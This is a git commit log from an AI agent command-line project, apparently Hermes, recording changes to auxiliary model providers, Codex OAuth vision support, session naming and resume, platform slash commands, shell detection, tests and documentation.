OPENAI_API_KEY with provider: 'main' already covers direct OpenAI API.

Provider options are now: auto, openrouter, nous, codex, main.

- Removed _try_openai(), _OPENAI_AUX_MODEL, _OPENAI_BASE_URL
- Replaced openai tests with codex provider tests
- Updated all docs to remove 'openai' option and clarify 'main'
- 'main' description now explicitly mentions it works with OpenAI API,
  local models, and any OpenAI-compatible endpoint

Tests: 2467 passed.
2026-03-08 18:50:26 -07:00
teknium1
71e81728ac feat: Codex OAuth vision support + multimodal content adapter
The Codex Responses API (chatgpt.com/backend-api/codex) supports
vision via gpt-5.3-codex. This was verified with real API calls
using image analysis.

Changes to _CodexCompletionsAdapter:
- Added _convert_content_for_responses() to translate chat.completions
  multimodal format to Responses API format:
  - {type: 'text'} → {type: 'input_text'}
  - {type: 'image_url', image_url: {url: '...'}} → {type: 'input_image', image_url: '...'}
- Fixed: removed 'stream' from resp_kwargs (responses.stream() handles it)
- Fixed: removed max_output_tokens and temperature (Codex endpoint rejects them)

Provider changes:
- Added 'codex' as explicit auxiliary provider option
- Vision auto-fallback now includes Codex (OpenRouter → Nous → Codex)
  since gpt-5.3-codex supports multimodal input
- Updated docs with Codex OAuth examples

Tested with real Codex OAuth token + ~/.hermes/image2.png — confirmed
working end-to-end through the full adapter pipeline.

Tests: 2459 passed.
2026-03-08 18:44:33 -07:00
Teknium
ebe60646db Merge pull request #735 from NousResearch/hermes/hermes-f8d56335
fix: allow non-codex-suffixed models (e.g. gpt-5.4) with OpenAI Codex provider
2026-03-08 18:30:27 -07:00
teknium1
f996d7950b fix: trust user-selected models with OpenAI Codex provider
The Codex model normalization was rejecting any model without 'codex'
in its name, forcing a fallback to gpt-5.3-codex. This blocked models
like gpt-5.4 that the Codex API actually supports.

The fix simplifies _normalize_model_for_provider() to two operations:
1. Strip provider prefixes (API needs bare slugs)
2. Replace the *untouched default* model with a Codex-compatible one

If the user explicitly chose a model — any model — we trust them and
let the API be the judge. No allowlists, no slug checks.

Also removes the 'codex not in slug' filter from _read_cache_models()
so the local cache preserves all API-available models.

Inspired by OpenClaw's approach which explicitly lists non-codex models
(gpt-5.4, gpt-5.2) as valid Codex models.
2026-03-08 18:29:09 -07:00
teknium1
ae4a674c84 feat: add 'openai' as auxiliary provider option
Users can now set provider: "openai" for auxiliary tasks (vision, web
extract, compression) to use OpenAI's API directly with their
OPENAI_API_KEY. This hits api.openai.com/v1 with gpt-4o-mini as the
default model — supports vision since GPT-4o handles image input.

Provider options are now: auto, openrouter, nous, openai, main.

Changes:
- agent/auxiliary_client.py: added _try_openai(), "openai" case in
  _resolve_forced_provider(), updated auxiliary_max_tokens_param()
  to use max_completion_tokens for OpenAI
- Updated docs: cli-config.yaml.example, AGENTS.md, and user-facing
  configuration.md with Common Setups section showing OpenAI,
  OpenRouter, and local model examples
- 3 new tests for OpenAI provider resolution

Tests: 2459 passed (was 2429).
2026-03-08 18:25:30 -07:00
teknium1
169615abc8 docs: add Auxiliary Models section to user-facing configuration docs
Adds clear how-to documentation for changing the vision model, web
extraction model, and compression model to the user-facing docs site
(website/docs/user-guide/configuration.md).

Includes:
- Full auxiliary config.yaml example
- 'Changing the Vision Model' walkthrough with config + env var options
- Provider options table (auto/openrouter/nous/main)
- Multimodal safety warning for vision
- Environment variable reference table
- Updated the warning about OpenRouter-dependent tools to mention
  auxiliary model configuration
2026-03-08 18:10:55 -07:00
teknium1
7c30ac2141 fix: overhaul ascii-art skill with working sources (#662)
Major issues fixed:
- Removed dead APIs: artii.herokuapp.com (404 since Heroku free tier
  ended 2022), patorjk.com TAAG AJAX endpoint (404)
- Removed unusable sources: emojicombos.com (3.3MB JS blob, not
  curl-accessible), asciiart.eu (art loads via JavaScript only)

New working sources added:
- asciified API (asciified.thelicato.io): free text-to-ASCII REST API,
  250+ FIGlet fonts, returns plain text, no auth — perfect remote
  alternative when pyfiglet isn't installed
- ascii.co.uk: classic ASCII art archive, art in <pre> tags,
  extractable with simple curl + Python parsing
- qrenco.de: QR codes as ASCII art via curl
- wttr.in: weather and moon phase as ASCII art via curl

Also fixed: Tool 6 no longer relies on web_extract inside
execute_code (which was the original #662 bug). All web lookups
now use terminal curl which is universally available.
2026-03-08 18:09:44 -07:00
teknium1
192501528f docs: add Auxiliary Model Configuration section to AGENTS.md
Clear how-to documentation for changing the vision model, web extraction
model, and compression model. Includes config.yaml examples, env var
alternatives, provider options table, and multimodal safety notes.
2026-03-08 18:09:18 -07:00
teknium1
5ae0b731d0 fix: harden auxiliary model config — gateway bridge, vision safety, tests
Improvements on top of PR #606 (auxiliary model configuration):

1. Gateway bridge: Added auxiliary.* and compression.summary_provider
   config bridging to gateway/run.py so config.yaml settings work from
   messaging platforms (not just CLI). Matches the pattern in cli.py.

2. Vision auto-fallback safety: In auto mode, vision now only tries
   OpenRouter + Nous Portal (known multimodal-capable providers).
   Custom endpoints, Codex, and API-key providers are skipped to avoid
   confusing errors from providers that don't support vision input.
   Explicit provider override (AUXILIARY_VISION_PROVIDER=main) still
   allows using any provider.

3. Comprehensive tests (46 new):
   - _get_auxiliary_provider env var resolution (8 tests)
   - _resolve_forced_provider with all provider types (8 tests)
   - Per-task provider routing integration (4 tests)
   - Vision auto-fallback safety (7 tests)
   - Config bridging logic (11 tests)
   - Gateway/CLI bridge parity (2 tests)
   - Vision model override via env var (2 tests)
   - DEFAULT_CONFIG shape validation (4 tests)

4. Docs: Added auxiliary_client.py to AGENTS.md project structure.
   Updated module docstring with separate text/vision resolution chains.

Tests: 2429 passed (was 2383).
2026-03-08 18:06:47 -07:00
teknium1
d9f373654b feat: enhance auxiliary model configuration and environment variable handling
- Added support for auxiliary model overrides in the configuration, allowing users to specify providers and models for vision and web extraction tasks.
- Updated the CLI configuration example to include new auxiliary model settings.
- Enhanced the environment variable mapping in the CLI to accommodate auxiliary model configurations.
- Improved the resolution logic for auxiliary clients to support task-specific provider overrides.
- Updated relevant documentation and comments for clarity on the new features and their usage.
2026-03-08 18:06:47 -07:00
Teknium
0efbb137e8 Merge pull request #734 from NousResearch/hermes/hermes-f8d56335
feat: display previous messages when resuming a session in CLI
2026-03-08 18:06:00 -07:00
teknium1
cf63b2471f docs: add resume history display to sessions, CLI, config, and AGENTS docs
- sessions.md: New 'Conversation Recap on Resume' subsection with visual
  example, feature bullet points, and config snippet
- cli.md: New 'Session Resume Display' subsection with cross-reference
- configuration.md: Add resume_display to display settings YAML block
- AGENTS.md: Add _preload_resumed_session() and _display_resumed_history()
  to key components, add UX note about resume panel
2026-03-08 17:55:14 -07:00
teknium1
f88343a6da Merge PR #733: feat: interactive session browser with search filtering (#718) 2026-03-08 17:47:42 -07:00
teknium1
491605cfea feat: add high-value tool result hints for patch and search_files (#722)
Add contextual [Hint: ...] suffixes to tool results where they save
real iterations:

- patch (no match): suggests read_file/search_files to verify content
  before retrying — addresses the common pattern where the agent retries
  with stale old_string instead of re-reading the file.
- search_files (truncated): provides explicit next offset and suggests
  narrowing the search — clearer than relying on total_count inference.

Other hints proposed in #722 (terminal, web_search, web_extract,
browser_snapshot, search zero-results, search content-matches) were
evaluated and found to be low-value: either already covered by existing
mechanisms (read_file pagination, similar-files, schema descriptions)
or guidance the agent already follows from its own reasoning.

5 new tests covering hint presence/absence for both tools.
2026-03-08 17:46:28 -07:00
teknium1
3aded1d4e5 feat: display previous messages when resuming a session in CLI
When resuming a session via --continue or --resume, show a compact recap
of the previous conversation inside a Rich panel before the input prompt.
This gives users immediate visual context about what was discussed.

Changes:
- Add _preload_resumed_session() to load session history early (in run(),
  before banner) so _init_agent() doesn't need a separate DB round-trip
- Add _display_resumed_history() that renders a formatted recap panel:
  * User messages shown with gold bullet (truncated at 300 chars)
  * Assistant responses shown with green diamond (truncated at 200 chars / 3 lines)
  * Tool calls collapsed to count + tool names
  * System messages and tool results hidden
  * <REASONING_SCRATCHPAD> blocks stripped from display
  * Pure-reasoning messages (no visible output) skipped entirely
  * Capped at last 10 exchanges with 'N earlier messages' indicator
  * Dim/muted styling distinguishes recap from active conversation
- Add display.resume_display config option: 'full' (default) or 'minimal'
- Store resume_display as instance variable (like compact) for testability
- 27 new tests covering all display scenarios, config, and edge cases

Closes #719
2026-03-08 17:45:45 -07:00
teknium1
4f0402ed3a chore: remove all NOUS_API_KEY references
NOUS_API_KEY is unused — vision tools use OPENROUTER_API_KEY or Nous
Portal OAuth (auth.json), and MoA tools use OPENROUTER_API_KEY.

Removed from:
- hermes_cli/config.py: api_keys allowlist for config set routing
- .env.example: example env file entry and comment
- tests/hermes_cli/test_set_config_value.py: parametrize test data
- tests/integration/test_web_tools.py: updated comments and log
  messages to reference 'auxiliary LLM provider' instead of NOUS_API_KEY

No HECATE references found in codebase (already cleaned up).
2026-03-08 17:45:38 -07:00
teknium1
ecac6321c4 feat: interactive session browser with search filtering (#718)
Add `hermes sessions browse` — a curses-based interactive session picker
with live type-to-search filtering, arrow key navigation, and seamless
session resume via Enter.

Features:
- Arrow keys to navigate, Enter to select and resume, Esc/q to quit
- Type characters to live-filter sessions by title, preview, source, or ID
- Backspace to edit filter, first Esc clears filter, second Esc exits
- Adaptive column layout (title/preview, last active, source, ID)
- Scrolling support for long session lists
- --source flag to filter by platform (cli, telegram, discord, etc.)
- --limit flag to control how many sessions to load (default: 50)
- Windows fallback: numbered list with input prompt
- After selection, seamlessly execs into `hermes --resume <id>`

Design decisions:
- Separate subcommand (not a flag on -c) — preserves `hermes -c` as-is
  for instant most-recent-session resume
- Uses curses (not simple_term_menu) per Known Pitfalls to avoid the
  arrow-key ghost-duplication rendering bug in tmux/iTerm
- Follows existing curses pattern from hermes_cli/tools_config.py

Also fixes: removed redundant `import os` inside cmd_sessions stats
block that shadowed the module-level import (would cause UnboundLocalError
if browse action was taken in the same function).

Tests: 33 new tests covering curses picker, fallback mode, filtering,
navigation, edge cases, and argument parser registration.
2026-03-08 17:42:50 -07:00
teknium1
20c6573e0a docs: comprehensive AGENTS.md audit and corrections
Major fixes:
- Default model: claude-sonnet-4.6 → claude-opus-4.6
- max_iterations default: 60 → 90 (also fixed in config.py OPTIONAL_ENV_VARS description)
- chat() signature: chat(user_message, task_id) → chat(message)
- Agent loop: _run_agent_loop() doesn't exist, loop is in run_conversation()
- Removed async/await references (agent is entirely synchronous)
- KawaiiSpinner location: run_agent.py → agent/display.py
- NOUS_API_KEY removed (not used by any tool), replaced with VOICE_TOOLS_OPENAI_KEY
- OPENAI_API_KEY for Whisper → VOICE_TOOLS_OPENAI_KEY
- check_for_missing_config() → check_config_version() + get_missing_env_vars()
- Adding tools: '2 files' → '3 files' (tool + model_tools.py + toolsets.py)
- Venv path: venv/ → .venv/
- Trajectory output path: trajectories/*.jsonl → trajectory_samples.jsonl
- process_command() location clarified (HermesCLI in cli.py, not commands.py)
- REQUIRED_ENV_VARS noted as intentionally empty
- _config_version noted as currently at version 5

New content:
- Project structure: added 40+ missing files across agent/, hermes_cli/, tools/, gateway/
- Full gateway/ directory listing with all modules and platforms/
- Added honcho_integration/, scripts/, tests/ directories
- Added hermes_constants.py, hermes_time.py, trajectory_compressor.py, utils.py
- CLI commands table: added 25+ missing commands (model, login, logout, whatsapp,
  skills subsystem, tools, insights, gateway start/stop/restart/status/uninstall,
  sessions export/delete/prune/stats, config path/env-path/show)
- Gateway slash commands section with all 20+ commands
- Platform toolsets: added hermes-cli, hermes-slack, hermes-homeassistant, hermes-gateway
- Gateway: added Home Assistant as supported platform
2026-03-08 17:38:05 -07:00
teknium1
97b1c76b14 test: add regression test for #712 (setup wizard codex import)
Verifies that setup.py imports the correct function name
(get_codex_model_ids) from codex_models.py. This would have caught
the ImportError bug before it reached users.
2026-03-08 17:32:52 -07:00
teknium1
24a37032fa Merge PR #711: fix(setup): correct import of get_codex_model_ids in setup wizard
Authored by dragonkhoi. Fixes #712.
2026-03-08 17:29:38 -07:00
teknium1
c0520223fd fix: clipboard BMP conversion file loss and broken test
Source code (hermes_cli/clipboard.py):
- _convert_to_png() lost the file when both Pillow and ImageMagick were
  unavailable: path.rename(tmp) moved the file to .bmp, then subprocess.run
  raised FileNotFoundError, but the file was never renamed back. The final
  fallback 'return path.exists()' returned False.
- Fix: restore the original file in both except handlers by renaming tmp
  back to path when the original is missing.

Test (tests/tools/test_clipboard.py):
- test_file_still_usable_when_no_converter expected 'from PIL import Image'
  to raise an Exception, but Pillow is installed so pytest.raises fired
  'DID NOT RAISE'. The test also never called _convert_to_png().
- Fix: properly mock PIL unavailability via patch.dict(sys.modules),
  actually call _convert_to_png(), and assert the correct result.
2026-03-08 17:22:27 -07:00
teknium1
1f1caa836a fix: error out when hermes -w is used outside a git repo
Previously, --worktree printed a yellow warning and continued without
isolation, silently defeating the purpose of the flag. Now it prints
a clear error message and exits immediately.
2026-03-08 17:22:24 -07:00
teknium1
b3ea7714f5 docs: add dedicated /compress command documentation
Add a detailed section for /compress in the CLI Commands Reference,
explaining what it does, when to use it, requirements, and output format.
Previously only had a one-line table entry.
2026-03-08 17:21:15 -07:00
teknium1
a7f9721785 feat: register remaining commands with platform menus
Telegram: add /insights, /update, /reload_mcp (underscore variant since
Telegram BotCommand names don't allow hyphens).

Discord: add /insights (with days parameter), /reload-mcp.

Also add reload_mcp as an alias for reload-mcp in the gateway command
dispatcher so Telegram's underscore form works, and add resume/provider
to the _known_commands set for hook emission.
2026-03-08 17:13:45 -07:00
teknium1
a5461e07bf feat: register title, resume, and other missing commands with platform menus
Add /title, /resume, /compress, /provider, /usage to Telegram's
set_my_commands so they appear in the / autocomplete menu.

Add /title, /resume, /compress, /provider, /usage, /help as Discord
slash commands so they appear in Discord's native command picker.

These commands were functional via text but not registered with the
platform-native command menus, so users couldn't discover them.
2026-03-08 17:11:49 -07:00
teknium1
2e73a9e893 Merge PR #704: fix: initialize Skills Hub before listing skills
Authored by PeterFile. Fixes #703.
2026-03-08 17:10:54 -07:00
teknium1
26bb56b775 feat: add /resume command to gateway for switching to named sessions
Messaging users can now switch back to previously-named sessions:
- /resume My Project  — resolves the title (with auto-lineage) and
  restores that session's conversation history
- /resume (no args)   — lists recent titled sessions to choose from

Adds SessionStore.switch_session() which ends the current session and
points the session entry at the target session ID so the old transcript
is loaded on the next message. Running agents are cleared on switch.

Completes the session naming feature from PR #720 for gateway users.

8 new tests covering: name resolution, lineage auto-latest, already-on-
session check, nonexistent names, agent cleanup, no-DB fallback, and
listing titled sessions.
2026-03-08 17:09:00 -07:00
teknium1
95b1130485 fix: normalize incompatible models when provider resolves to Codex
When _ensure_runtime_credentials() resolves the provider to openai-codex,
check if the active model is Codex-compatible.  If not (e.g. the default
anthropic/claude-opus-4.6), swap it for the best available Codex model.
Also strips provider prefixes the Codex API rejects (openai/gpt-5.3-codex
→ gpt-5.3-codex).

Adds _model_is_default flag so warnings are only shown when the user
explicitly chose an incompatible model (not when it's the config default).

Fixes #651.

Co-inspired-by: stablegenius49 (PR #661)
Co-inspired-by: teyrebaz33 (PR #696)
2026-03-08 16:48:56 -07:00
teknium1
3fb8938cd3 fix: search_files now reports error for non-existent paths instead of silent empty results
Previously, search_files would silently return 0 results when the
search path didn't exist (e.g., /root/.hermes/... when HOME is
/home/user). The path was passed to rg/grep/find which would fail
silently, and the empty stdout was parsed as 'no matches found'.

Changes:
- Add path existence check at the top of search() using test -e.
  Returns SearchResult with a clear error message when path doesn't exist.
- Add exit code 2 checks in _search_with_rg() and _search_with_grep()
  as secondary safety net for other error types (bad regex, permissions).
- Add 4 new tests covering: nonexistent path (content mode), nonexistent
  path (files mode), existing path proceeds normally, rg error exit code.

Tests: 37 → 41 in test_file_operations.py, full suite 2330 passed.
2026-03-08 16:47:20 -07:00
Teknium
c5e8166c8b Merge pull request #720 from NousResearch/feat/session-naming
feat: Session naming with unique titles, auto-lineage & rich listing
2026-03-08 16:32:13 -07:00
teknium1
2b88568653 docs: add session naming documentation across all doc files
- website/docs/user-guide/sessions.md: New 'Session Naming' section
  with /title usage, title rules, auto-lineage, gateway support.
  Updated 'Resume by Name' section, 'Rename a Session' subsection,
  updated sessions list output format, updated DB schema description.
- website/docs/reference/cli-commands.md: Added -c "name" and
  --resume by title to Core Commands, sessions rename to Sessions
  table, /title to slash commands.
- website/docs/user-guide/cli.md: Added -c "name" and --resume by
  title to resume options.
- AGENTS.md: Added -c, --resume, sessions list/rename to CLI commands
  table. Added hermes_state.py to project structure.
- CONTRIBUTING.md: Updated hermes_state.py and session persistence
  descriptions to mention titles.
- hermes_cli/main.py: Fixed sessions help string to include 'rename'.
2026-03-08 16:09:31 -07:00
teknium1
34b4fe495e fix: add title validation — sanitize, length limit, control char stripping
- Add SessionDB.sanitize_title() static method:
  - Strips ASCII control chars (null, bell, ESC, etc.) except whitespace
  - Strips problematic Unicode controls (zero-width, RTL override, BOM)
  - Collapses whitespace runs, strips edges
  - Normalizes empty/whitespace-only to None
  - Enforces 100 char max length (raises ValueError)
- set_session_title() now calls sanitize_title() internally,
  so all call sites (CLI, gateway, auto-lineage) are protected
- CLI /title handler sanitizes early to show correct feedback
- Gateway /title handler sanitizes early to show correct feedback
- 24 new tests: sanitize_title (17 cases covering control chars,
  zero-width, RTL, BOM, emoji, CJK, length, integration),
  gateway validation (too long, control chars, only-control-chars)
2026-03-08 15:54:51 -07:00
teknium1
4fdd6c0dac fix: harden session title system + add /title to gateway
- Empty string titles normalized to None (prevents uncaught IntegrityError
  when two sessions both get empty-string titles via the unique index)
- Escape SQL LIKE wildcards (%, _) in resolve_session_by_title and
  get_next_title_in_lineage to prevent false matches on titles like
  'test_project' matching 'testXproject #2'
- Optimize list_sessions_rich from N+2 queries to a single query with
  correlated subqueries (preview + last_active computed in SQL)
- Add /title slash command to gateway (Telegram, Discord, Slack, WhatsApp)
  with set and show modes, uniqueness conflict handling
- Add /title to gateway /help text and _known_commands
- 12 new tests: empty string normalization, multi-empty-title safety,
  SQL wildcard edge cases, gateway /title set/show/conflict/cross-platform
2026-03-08 15:48:09 -07:00
teknium1
60b6abefd9 feat: session naming with unique titles, auto-lineage, rich listing, resume by name
- Schema v4: unique title index, migration from v2/v3
- set/get/resolve session titles with uniqueness enforcement
- Auto-lineage: context compression auto-numbers titles (Task -> Task #2 -> Task #3)
- resolve_session_by_title: auto-latest finds most recent continuation
- list_sessions_rich: preview (first 60 chars) + last_active timestamp
- CLI: -c accepts optional name arg (hermes -c 'my project')
- CLI: /title command with deferred mode (set before session exists)
- CLI: sessions list shows Title, Preview, Last Active, ID
- 27 new tests (1844 total passing)
2026-03-08 15:20:29 -07:00
teknium1
4d53b7ccaa Add OpenRouter app attribution headers to skills_guard and trajectory_compressor
These two files were creating bare OpenAI clients pointing at OpenRouter
without the HTTP-Referer / X-OpenRouter-Title / X-OpenRouter-Categories
headers that the rest of the codebase sends for app attribution.

- skills_guard.py: LLM audit client (always OpenRouter)
- trajectory_compressor.py: sync + async summarization clients
  (guarded with 'openrouter' in base_url check since the endpoint
  is user-configurable)
2026-03-08 14:23:18 -07:00
Khoi Le
081079da62 fix(setup): correct import of get_codex_model_ids in setup wizard
The setup wizard imported `get_codex_models` which does not exist;
the actual function is `get_codex_model_ids`. This caused a runtime
ImportError when selecting the openai-codex provider during setup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-08 13:07:19 -07:00
Verne
333e4abe30 fix: Initialize Skills Hub on list
Call ensure_hub_dirs() at the start of hermes skills list so the\nSkills Hub directory structure is created before reading hub\nmetadata.\n\nAdd a regression test covering the empty-home path where\ndoctor recommends running the list command.\n\nRefs: #703
2026-03-09 01:43:59 +08:00
teknium1
cd77c7100c Merge PR #648: test: add regression coverage for compressor tool-call boundaries
Authored by intertwine. Related to #647.
2026-03-08 06:46:50 -07:00
teknium1
cf810c2950 fix: pre-process CLI clipboard images through vision tool instead of raw embedding
Images pasted in the CLI were embedded as raw base64 image_url content
parts in the conversation history, which only works with vision-capable
models. If the main model (e.g. Nous API) doesn't support vision, this
breaks the request and poisons all subsequent messages.

Now the CLI uses the same approach as the messaging gateway: images are
pre-processed through the auxiliary vision model (Gemini Flash via
OpenRouter or Nous Portal) and converted to text descriptions. The
local file path is included so the agent can re-examine via
vision_analyze if needed. Works with any model.

Fixes #638.
2026-03-08 06:22:00 -07:00
teknium1
a23bcb81ce fix: improve /model user feedback + update docs
User messaging improvements:
- Rejection: '(>_<) Error: not a valid model' instead of '(^_^) Warning: Error:'
- Rejection: shows 'Model unchanged' + tip about /model and /provider
- Session-only: explains 'this session only' with reason and 'will revert on restart'
- Saved: clear '(saved to config)' confirmation

Docs updated:
- cli-commands.md, cli.md, messaging/index.md: /model now shows
  provider:model syntax, /provider command added to tables

Test fixes: deduplicated test names, assertions match new messages.
2026-03-08 06:13:12 -07:00
stablegenius49
d07d867718 Fix empty tool selection persistence 2026-03-08 06:11:18 -07:00
teknium1
666f2dd486 feat: /provider command + fix gateway bugs + harden parse_model_input
/provider command (CLI + gateway):
  Shows all providers with auth status (✓/✗), aliases, and active marker.
  Users can now discover what provider names work with provider:model syntax.

Gateway bugs fixed:
  - Config was saved even when validation.persist=False (told user 'session
    only' but actually persisted the unvalidated model)
  - HERMES_INFERENCE_PROVIDER env var not set on provider switch, causing
    the switch to be silently overridden if that env var was already set

parse_model_input hardened:
  - Colon only treated as provider delimiter if left side is a recognized
    provider name or alias. 'anthropic/claude-3.5-sonnet:beta' now passes
    through as a model name instead of trying provider='anthropic/claude-3.5-sonnet'.
  - HTTP URLs, random colons no longer misinterpreted.

56 tests passing across model validation, CLI commands, and integration.
2026-03-08 06:09:36 -07:00
teknium1
34792dd907 fix: resolve 'auto' provider properly via credential detection
'auto' doesn't always mean openrouter — it could be nous, zai,
kimi-coding, etc. depending on configured credentials. Reverted the
hardcoded mapping and now both CLI and gateway call
resolve_provider() to detect the actual active provider when 'auto'
is set. Falls back to openrouter only if resolution fails.
2026-03-08 05:58:45 -07:00
teknium1
7ad6fc8a40 fix: gateway /model also needs normalize_provider for 'auto' resolution 2026-03-08 05:56:43 -07:00
teknium1
f824c10429 feat: enhance config migration with new environment variable tracking
Added a system to track environment variables introduced in each config version, allowing migration prompts to only mention new variables since the user's last version. Updated the interactive configuration process to offer users the option to set these new optional keys during migration.
2026-03-08 05:55:32 -07:00
teknium1
132e5ec179 fix: resolve 'auto' provider in /model display + update gateway handler
- normalize_provider('auto') now returns 'openrouter' (the default)
  so /model shows the curated model list instead of nothing
- CLI /model display uses normalize_provider before looking up labels
- Gateway /model handler now uses the same validation logic as CLI:
  live API probe, provider:model syntax, curated model list display
2026-03-08 05:54:52 -07:00
teknium1
66d3e6a0c2 feat: provider switching via /model + enhanced model display
Add provider:model syntax to /model command for runtime provider switching:
  /model zai:glm-5           → switch to Z.AI provider with glm-5
  /model nous:hermes-3       → switch to Nous Portal with hermes-3
  /model openrouter:anthropic/claude-sonnet-4.5  → explicit OpenRouter

When switching providers, credentials are resolved via resolve_runtime_provider
and validated before committing. Both model and provider are saved to config.
Provider aliases work (glm: → zai, kimi: → kimi-coding, etc.).

Enhanced /model (no args) display now shows:
  - Current model and provider
  - Curated model list for the current provider with ← marker
  - Usage examples including provider:model syntax

39 tests covering parse_model_input, curated_models_for_provider,
provider switching (success + credential failure), and display output.
2026-03-08 05:45:59 -07:00
teknium1
4a09ae2985 chore: remove dead module stubs from test_cli_init.py
The 200 lines of prompt_toolkit/rich/fire stubs added in PR #650 were
guarded by 'if module in sys.modules: return' and never activated since
those dependencies are always installed. Removed to keep the test file
lean. Also removed unused MagicMock and pytest imports.
2026-03-08 05:35:02 -07:00
teknium1
8c734f2f27 fix: remove OpenRouter '/' format enforcement — let API probe be the authority
Not all providers require 'provider/model' format. Removing the rigid
format check lets the live API probe handle all validation uniformly.
If someone types 'gpt-5.4' on OpenRouter, the probe won't find it and
will suggest 'openai/gpt-5.4' — better UX than a format rejection.
2026-03-08 05:31:41 -07:00
teknium1
245d174359 feat: validate /model against live API instead of hardcoded lists
Replace the static catalog-based model validation with a live API probe.
The /model command now hits the provider's /models endpoint to check if
the requested model actually exists:

- Model found in API → accepted + saved to config
- Model NOT found in API → rejected with 'Error: not a valid model'
  and fuzzy-match suggestions from the live model list
- API unreachable → graceful fallback to hardcoded catalog (session-only
  for unrecognized models)
- Format errors (empty, spaces, missing '/') still caught instantly
  without a network call

The API probe takes ~0.2s for OpenRouter (346 models) and works with any
OpenAI-compatible endpoint (Ollama, vLLM, custom, etc.).

32 tests covering all paths: format checks, API found, API not found,
API unreachable fallback, CLI integration.
2026-03-08 05:22:20 -07:00
stablegenius49
77f47768dd fix: improve /history message display 2026-03-08 05:08:57 -07:00
teknium1
90fa9e54ca fix: guard validate_requested_model + expand test coverage (PR #649 follow-up)
- Wrap validate_requested_model in try/except so /model doesn't crash
  if validation itself fails (falls back to old accept+save behavior)
- Remove unnecessary sys.path.insert from both test files
- Expand test_model_validation.py: 4 → 23 tests covering normalize_provider,
  provider_model_ids, empty/whitespace/spaces rejection, OpenRouter format
  validation, custom endpoints, nous provider, provider aliases, unknown
  providers, fuzzy suggestions
- Expand test_cli_model_command.py: 2 → 5 tests adding known-model save,
  validation crash fallback, and /model with no argument
2026-03-08 04:47:35 -07:00
stablegenius49
9d3a44e0e8 fix: validate /model values before saving 2026-03-08 04:47:35 -07:00
teknium1
932d596466 feat: enhance systemd unit and install script for browser dependencies
Updated the systemd unit generation to include the virtual environment and node modules in the PATH, improving the execution context for the hermes CLI. Additionally, added support for installing Playwright and its dependencies on Arch/Manjaro systems in the install script, ensuring a smoother setup process for browser tools.
2026-03-08 04:36:23 -07:00
teknium1
d518f40e8b fix: improve browser command environment setup
Enhanced the environment setup for browser commands by ensuring the PATH variable includes standard directories, addressing potential issues with minimal PATH in systemd services. Additionally, updated the logging of stderr to use a warning level on failure for better visibility of errors. This change improves the robustness of subprocess execution in the browser tool.
2026-03-08 04:08:44 -07:00
Teknium
f016cfca46 Merge pull request #685 from NousResearch/revert-659-feat/skill-prerequisites
Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies"
2026-03-08 03:58:41 -07:00
Teknium
b8120df860 Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies" 2026-03-08 03:58:13 -07:00
teknium1
0df7df52f3 test: expand slash command autocomplete coverage (PR #645 follow-up)
- Fix failing test: use display_text/display_meta_text instead of str()
  on prompt_toolkit FormattedText objects
- Add regression guard: EXPECTED_COMMANDS set ensures no command
  silently disappears from the shared dict
- Add edge case tests: non-slash input, empty input, partial vs exact
  match trailing space, builtin display_meta content
- Add skill provider tests: None provider, exception swallowing,
  description truncation at 50 chars, missing description fallback,
  exact-match trailing space on skill commands
- Total: 15 tests (up from 4)
2026-03-08 03:53:22 -07:00
stablegenius49
bfa27d0a68 fix(cli): unify slash command autocomplete registry 2026-03-08 03:53:22 -07:00
teknium1
5a20c486e3 Merge PR #659: feat: skill prerequisites — hide skills with unmet runtime dependencies
Authored by kshitijk4poor. Fixes #630.
2026-03-08 03:12:35 -07:00
teknium1
78e19ebc95 chore: update .gitignore to include .worktrees directory
Added .worktrees to the .gitignore file to prevent tracking of worktree-specific files, ensuring a cleaner repository.
2026-03-08 03:01:46 -07:00
teknium1
b383cafc44 refactor: rename and enhance shell detection in local environment
Renamed _find_shell to _find_bash to clarify its purpose of specifically locating bash. Improved the shell detection logic to prioritize bash over the user's $SHELL, ensuring compatibility with the fence wrapper's syntax requirements. Added a backward compatibility alias for _find_shell to maintain existing imports in process_registry.py.
2026-03-08 03:00:05 -07:00
teknium1
b10ff83566 fix: enhance PATH handling in local environment
Updated the LocalEnvironment class to ensure the PATH variable includes standard directories. This change addresses issues with systemd services and terminal multiplexers that inherit a minimal PATH, improving the execution environment for subprocesses.
2026-03-08 01:50:38 -08:00
teknium1
daa1f542f9 fix: enhance shell detection in local environment configuration
Updated the _find_shell function to improve shell detection on non-Windows systems. The function now checks for the existence of /usr/bin/bash and /bin/bash before falling back to /bin/sh, ensuring a more robust shell resolution process.
2026-03-08 01:43:00 -08:00
teknium1
d507f593d0 fix: respect config.yaml cwd in gateway, add sandbox_dir config option
Two fixes:

1. Gateway CWD override: TERMINAL_CWD from config.yaml was being
   unconditionally overwritten by the messaging_cwd fallback (line 114).
   Now explicit paths in config.yaml are respected — only '.' / 'auto' /
   'cwd' (or unset) fall back to MESSAGING_CWD or home directory.

2. sandbox_dir config: Added terminal.sandbox_dir to config.yaml bridge
   in gateway/run.py, cli.py, and hermes_cli/config.py. Maps to
   TERMINAL_SANDBOX_DIR env var, which get_sandbox_dir() reads to
   determine where Docker/Singularity sandbox data is stored (default:
   ~/.hermes/sandboxes/). Users can now set:
     hermes config set terminal.sandbox_dir /data/hermes-sandboxes
2026-03-08 01:33:46 -08:00
kshitij
f210510276 feat: add prerequisites field to skill spec — hide skills with unmet dependencies
Skills can now declare runtime prerequisites (env vars, CLI binaries) via
YAML frontmatter. Skills with unmet prerequisites are excluded from the
system prompt so the agent never claims capabilities it can't deliver, and
skill_view() warns the agent about what's missing.

Three layers of defense:
- build_skills_system_prompt() filters out unavailable skills
- _find_all_skills() flags unmet prerequisites in metadata
- skill_view() returns prerequisites_warning with actionable details

Tagged 12 bundled skills that have hard runtime dependencies:
gif-search (TENOR_API_KEY), notion (NOTION_API_KEY), himalaya, imessage,
apple-notes, apple-reminders, openhue, duckduckgo-search, codebase-inspection,
blogwatcher, songsee, mcporter.

Closes #658
Fixes #630
2026-03-08 13:19:32 +05:30
teknium1
19b6f81ee7 fix: allow Anthropic API URLs as custom OpenAI-compatible endpoints
Removed the hard block on base_url containing 'api.anthropic.com'.
Anthropic now offers an OpenAI-compatible /chat/completions endpoint,
so blocking their URL prevents legitimate use. If the endpoint isn't
compatible, the API call will fail with a proper error anyway.

Removed from: run_agent.py, mini_swe_runner.py
Updated test to verify Anthropic URLs are accepted.
